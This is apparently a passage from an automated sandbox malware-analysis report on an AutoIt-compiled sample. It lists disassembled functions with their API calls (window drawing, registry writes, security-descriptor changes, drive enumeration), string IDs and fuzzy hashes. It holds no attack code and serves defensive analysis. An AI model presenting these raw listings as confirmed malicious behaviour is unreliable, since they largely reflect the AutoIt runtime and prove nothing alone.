            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
            • API String ID: 2910397461-517079104
            • Opcode ID: eb5999f88ba8a6bade3fde64d5c82d6594fc3adafdbf084bfa05709f7076b04b
            • Instruction ID: 430dc1147744dcad962ee987b28d8fb5d91e4a7f1e0bf9446020dba5a66dedee
            • Opcode Fuzzy Hash: eb5999f88ba8a6bade3fde64d5c82d6594fc3adafdbf084bfa05709f7076b04b
            • Instruction Fuzzy Hash: 2FB17FB1A00215AFEB24DFA8CD85FAE7BA9FB09710F008155F954E72D0D779E940CB50
            Function 01014ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
            Download Yara Rule
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 01014AED
            • GetDriveTypeW.KERNEL32(?,0103CB68,?,\\.\,0103CC08), ref: 01014BCA
            • SetErrorMode.KERNEL32(00000000,0103CB68,?,\\.\,0103CC08), ref: 01014D36
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorMode$DriveType
            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
            • API String ID: 2907320926-4222207086
            • Opcode ID: 23c417b5704f45ee83a45124de9692db4598867f25a949f3d64ab3f907e94d69
            • Instruction ID: 10fb8095f4d3339bff49e963af379463bf507fcd17dad0ef1887ad21763fadc0
            • Opcode Fuzzy Hash: 23c417b5704f45ee83a45124de9692db4598867f25a949f3d64ab3f907e94d69
            • Instruction Fuzzy Hash: FF61F570A0410ADFCB44EF28CA81D7C77E5BB56340B144059F886EB269CB7EDD85CB41
            Function 010373E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
            Download Yara Rule
            APIs
            • GetSysColor.USER32(00000012), ref: 01037421
            • SetTextColor.GDI32(?,?), ref: 01037425
            • GetSysColorBrush.USER32(0000000F), ref: 0103743B
            • GetSysColor.USER32(0000000F), ref: 01037446
            • CreateSolidBrush.GDI32(?), ref: 0103744B
            • GetSysColor.USER32(00000011), ref: 01037463
            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 01037471
            • SelectObject.GDI32(?,00000000), ref: 01037482
            • SetBkColor.GDI32(?,00000000), ref: 0103748B
            • SelectObject.GDI32(?,?), ref: 01037498
            • InflateRect.USER32(?,000000FF,000000FF), ref: 010374B7
            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 010374CE
            • GetWindowLongW.USER32(00000000,000000F0), ref: 010374DB
            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0103752A
            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 01037554
            • InflateRect.USER32(?,000000FD,000000FD), ref: 01037572
            • DrawFocusRect.USER32(?,?), ref: 0103757D
            • GetSysColor.USER32(00000011), ref: 0103758E
            • SetTextColor.GDI32(?,00000000), ref: 01037596
            • DrawTextW.USER32(?,010370F5,000000FF,?,00000000), ref: 010375A8
            • SelectObject.GDI32(?,?), ref: 010375BF
            • DeleteObject.GDI32(?), ref: 010375CA
            • SelectObject.GDI32(?,?), ref: 010375D0
            • DeleteObject.GDI32(?), ref: 010375D5
            • SetTextColor.GDI32(?,?), ref: 010375DB
            • SetBkColor.GDI32(?,?), ref: 010375E5
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
            • String ID:
            • API String ID: 1996641542-0
            • Opcode ID: 4074749405e417deb460d4df7379be300ea587cb4042ca86ee502bc9e01e8bbf
            • Instruction ID: c89fabb637eccf842dfaadd9ad0c92b1cda5c236a634f9faecc7756939a0cb90
            • Opcode Fuzzy Hash: 4074749405e417deb460d4df7379be300ea587cb4042ca86ee502bc9e01e8bbf
            • Instruction Fuzzy Hash: 0C619E72900218AFEF119FA8DC49AEE7FBDEB09320F104512FA51FB291D7759940DB90
            Function 01030FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
            Download Yara Rule
            APIs
            • GetCursorPos.USER32(?), ref: 01031128
            • GetDesktopWindow.USER32 ref: 0103113D
            • GetWindowRect.USER32(00000000), ref: 01031144
            • GetWindowLongW.USER32(?,000000F0), ref: 01031199
            • DestroyWindow.USER32(?), ref: 010311B9
            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 010311ED
            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0103120B
            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0103121D
            • SendMessageW.USER32(00000000,00000421,?,?), ref: 01031232
            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 01031245
            • IsWindowVisible.USER32(00000000), ref: 010312A1
            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 010312BC
            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 010312D0
            • GetWindowRect.USER32(00000000,?), ref: 010312E8
            • MonitorFromPoint.USER32(?,?,00000002), ref: 0103130E
            • GetMonitorInfoW.USER32(00000000,?), ref: 01031328
            • CopyRect.USER32(?,?), ref: 0103133F
            • SendMessageW.USER32(00000000,00000412,00000000), ref: 010313AA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
            • String ID: ($0$tooltips_class32
            • API String ID: 698492251-4156429822
            • Opcode ID: 0d5d0b755a14e09b906169dbb3f776ace0fa7fd4e83fff9cf67dd68aa24858c0
            • Instruction ID: 4d054c7cf1e59084c1bc53cfb41cd2c20867bd3dd21ba2273bbd9f9002f5b70e
            • Opcode Fuzzy Hash: 0d5d0b755a14e09b906169dbb3f776ace0fa7fd4e83fff9cf67dd68aa24858c0
            • Instruction Fuzzy Hash: E5B1AE71608341AFD750DF64C984BAEBBE8FF89350F048959F9D9AB292C771E804CB91
            Function 01030241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
            Download Yara Rule
            APIs
            • CharUpperBuffW.USER32(?,?), ref: 010302E5
            • _wcslen.LIBCMT ref: 0103031F
            • _wcslen.LIBCMT ref: 01030389
            • _wcslen.LIBCMT ref: 010303F1
            • _wcslen.LIBCMT ref: 01030475
            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 010304C5
            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01030504
              • Part of subcall function 00FBF9F2: _wcslen.LIBCMT ref: 00FBF9FD
              • Part of subcall function 0100223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01002258
              • Part of subcall function 0100223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0100228A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$MessageSend$BuffCharUpper
            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
            • API String ID: 1103490817-719923060
            • Opcode ID: 496673aaa8150fc089d960234283e9a6075e8231766744805784de5bfb6e5c9f
            • Instruction ID: 8f89281fa036b45e3664bb0f7a651399f6c9150d93e00a8ae719e14857445d97
            • Opcode Fuzzy Hash: 496673aaa8150fc089d960234283e9a6075e8231766744805784de5bfb6e5c9f
            • Instruction Fuzzy Hash: F3E1CF712152018FC714DF28C95096EB7EABFC8318F14899CF8D69B2AADB34ED45CB41
            Function 00FB8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
            Download Yara Rule
            APIs
            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FB8968
            • GetSystemMetrics.USER32(00000007), ref: 00FB8970
            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FB899B
            • GetSystemMetrics.USER32(00000008), ref: 00FB89A3
            • GetSystemMetrics.USER32(00000004), ref: 00FB89C8
            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FB89E5
            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FB89F5
            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FB8A28
            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FB8A3C
            • GetClientRect.USER32(00000000,000000FF), ref: 00FB8A5A
            • GetStockObject.GDI32(00000011), ref: 00FB8A76
            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB8A81
              • Part of subcall function 00FB912D: GetCursorPos.USER32(?), ref: 00FB9141
              • Part of subcall function 00FB912D: ScreenToClient.USER32(00000000,?), ref: 00FB915E
              • Part of subcall function 00FB912D: GetAsyncKeyState.USER32(00000001), ref: 00FB9183
              • Part of subcall function 00FB912D: GetAsyncKeyState.USER32(00000002), ref: 00FB919D
            • SetTimer.USER32(00000000,00000000,00000028,00FB90FC), ref: 00FB8AA8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
            • String ID: AutoIt v3 GUI
            • API String ID: 1458621304-248962490
            • Opcode ID: cc20b7e558811e32662611b3607119d51f711ec7e9d936ba48dabd16b2afa2f2
            • Instruction ID: efd84b204816e72d1682b95c000d6f6cf489d8bc3b7537971827dfe824b0838a
            • Opcode Fuzzy Hash: cc20b7e558811e32662611b3607119d51f711ec7e9d936ba48dabd16b2afa2f2
            • Instruction Fuzzy Hash: 7BB17C71A0020AAFDB24DF69C945BEA3BB8FB48314F10421AFA55E72D4DB79A841DF50
            Function 01000D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 010010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01001114
              • Part of subcall function 010010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 01001120
              • Part of subcall function 010010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 0100112F
              • Part of subcall function 010010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 01001136
              • Part of subcall function 010010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0100114D
            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01000DF5
            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01000E29
            • GetLengthSid.ADVAPI32(?), ref: 01000E40
            • GetAce.ADVAPI32(?,00000000,?), ref: 01000E7A
            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01000E96
            • GetLengthSid.ADVAPI32(?), ref: 01000EAD
            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 01000EB5
            • HeapAlloc.KERNEL32(00000000), ref: 01000EBC
            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01000EDD
            • CopySid.ADVAPI32(00000000), ref: 01000EE4
            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01000F13
            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01000F35
            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 01000F47
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01000F6E
            • HeapFree.KERNEL32(00000000), ref: 01000F75
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01000F7E
            • HeapFree.KERNEL32(00000000), ref: 01000F85
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01000F8E
            • HeapFree.KERNEL32(00000000), ref: 01000F95
            • GetProcessHeap.KERNEL32(00000000,?), ref: 01000FA1
            • HeapFree.KERNEL32(00000000), ref: 01000FA8
              • Part of subcall function 01001193: GetProcessHeap.KERNEL32(00000008,01000BB1,?,00000000,?,01000BB1,?), ref: 010011A1
              • Part of subcall function 01001193: HeapAlloc.KERNEL32(00000000,?,00000000,?,01000BB1,?), ref: 010011A8
              • Part of subcall function 01001193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,01000BB1,?), ref: 010011B7
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
            • String ID:
            • API String ID: 4175595110-0
            • Opcode ID: c7f87c9166b4d544f7f7c227cd69e96123301a91d969047fe0a0722d944b1de8
            • Instruction ID: 5cd715897cf4ecb3fabff831a32198fd6e176c953113f2d94646153047ff0d0b
            • Opcode Fuzzy Hash: c7f87c9166b4d544f7f7c227cd69e96123301a91d969047fe0a0722d944b1de8
            • Instruction Fuzzy Hash: CC717C7290020AABFB219FA8DD44FEEBBBCBF05341F044159FA99F6184D7359905DB60
            Function 0102C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
            Download Yara Rule
            APIs
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0102C4BD
            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0103CC08,00000000,?,00000000,?,?), ref: 0102C544
            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0102C5A4
            • _wcslen.LIBCMT ref: 0102C5F4
            • _wcslen.LIBCMT ref: 0102C66F
            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0102C6B2
            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0102C7C1
            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0102C84D
            • RegCloseKey.ADVAPI32(?), ref: 0102C881
            • RegCloseKey.ADVAPI32(00000000), ref: 0102C88E
            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0102C960
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
            • API String ID: 9721498-966354055
            • Opcode ID: 052fbd0a4ceea895d62d82c6870b51fd69d721752d74ca31b3253652f7ea03d7
            • Instruction ID: 7d3ba98284dc6ea5a34bf48e419642b38080282bcfb521547a86ff3c0b73b4a2
            • Opcode Fuzzy Hash: 052fbd0a4ceea895d62d82c6870b51fd69d721752d74ca31b3253652f7ea03d7
            • Instruction Fuzzy Hash: 60126A756042119FE714EF14C981E2AB7E5FF89714F08889CF98A9B3A2DB35EC41DB81
            Function 0103091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
            Download Yara Rule
            APIs
            • CharUpperBuffW.USER32(?,?), ref: 010309C6
            • _wcslen.LIBCMT ref: 01030A01
            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01030A54
            • _wcslen.LIBCMT ref: 01030A8A
            • _wcslen.LIBCMT ref: 01030B06
            • _wcslen.LIBCMT ref: 01030B81
              • Part of subcall function 00FBF9F2: _wcslen.LIBCMT ref: 00FBF9FD
              • Part of subcall function 01002BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 01002BFA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$MessageSend$BuffCharUpper
            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
            • API String ID: 1103490817-4258414348
            • Opcode ID: d4976addf33feba6fd0a3424fe60a601c8e71e95dc706f2795948928e5332956
            • Instruction ID: af4a51840b3e81a15de5b010c835915dd2eb77d7c956cebb918a7ee1d58e7ecd
            • Opcode Fuzzy Hash: d4976addf33feba6fd0a3424fe60a601c8e71e95dc706f2795948928e5332956
            • Instruction Fuzzy Hash: C5E189312097018FC714EF29C85096AB7E9BFC9214F04899DF8D69B3A6D735ED46CB81
            Function 0102C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$BuffCharUpper
            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
            • API String ID: 1256254125-909552448
            • Opcode ID: d39c48a2354b344e7533d546503cf036f1701d8f5eb228ca4b033e815f3a7c5c
            • Instruction ID: 54d47cf1d3e0ec4ac7e77b6b23379e81a8a8fd6789c587d0c9f14cf7ef0eb956
            • Opcode Fuzzy Hash: d39c48a2354b344e7533d546503cf036f1701d8f5eb228ca4b033e815f3a7c5c
            • Instruction Fuzzy Hash: BA710332A001368BEB21DE7CCE516BE33D5AF51698F250168FCD6A7286E639DD44D3A0
            Function 0103833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
            Download Yara Rule
            APIs
            • _wcslen.LIBCMT ref: 0103835A
            • _wcslen.LIBCMT ref: 0103836E
            • _wcslen.LIBCMT ref: 01038391
            • _wcslen.LIBCMT ref: 010383B4
            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 010383F2
            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,01035BF2), ref: 0103844E
            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01038487
            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 010384CA
            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01038501
            • FreeLibrary.KERNEL32(?), ref: 0103850D
            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0103851D
            • DestroyIcon.USER32(?,?,?,?,?,01035BF2), ref: 0103852C
            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 01038549
            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 01038555
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
            • String ID: .dll$.exe$.icl
            • API String ID: 799131459-1154884017
            • Opcode ID: 801cd57b64129156552d0ca465916c3adcbb163d16ef53f6a8d54b3e97cb9a14
            • Instruction ID: 48d218286ae6257a04f171aed4a1779e2eb8970ff588496715b7363f6a1a6d77
            • Opcode Fuzzy Hash: 801cd57b64129156552d0ca465916c3adcbb163d16ef53f6a8d54b3e97cb9a14
            • Instruction Fuzzy Hash: 13610271900215BEEB24DF64CC41FBE77ACBF48710F10868AF995E61D1DB79A980D7A0
            Function 00FA7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
            • API String ID: 0-1645009161
            • Opcode ID: ed4a8696ca4737287491924efcd41025fee38604c94ff39706967868aa2909cd
            • Instruction ID: 9d65c74344b6792679b603eaed2751b47854c7ca07d629786189988ce350a4b2
            • Opcode Fuzzy Hash: ed4a8696ca4737287491924efcd41025fee38604c94ff39706967868aa2909cd
            • Instruction Fuzzy Hash: 03810BB1A04706BBDB10BF61DD42FAE3768AF56750F044029F904AB192EB78D901F7A1
            Function 01005A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
            Download Yara Rule
            APIs
            • LoadIconW.USER32(00000063), ref: 01005A2E
            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 01005A40
            • SetWindowTextW.USER32(?,?), ref: 01005A57
            • GetDlgItem.USER32(?,000003EA), ref: 01005A6C
            • SetWindowTextW.USER32(00000000,?), ref: 01005A72
            • GetDlgItem.USER32(?,000003E9), ref: 01005A82
            • SetWindowTextW.USER32(00000000,?), ref: 01005A88
            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 01005AA9
            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 01005AC3
            • GetWindowRect.USER32(?,?), ref: 01005ACC
            • _wcslen.LIBCMT ref: 01005B33
            • SetWindowTextW.USER32(?,?), ref: 01005B6F
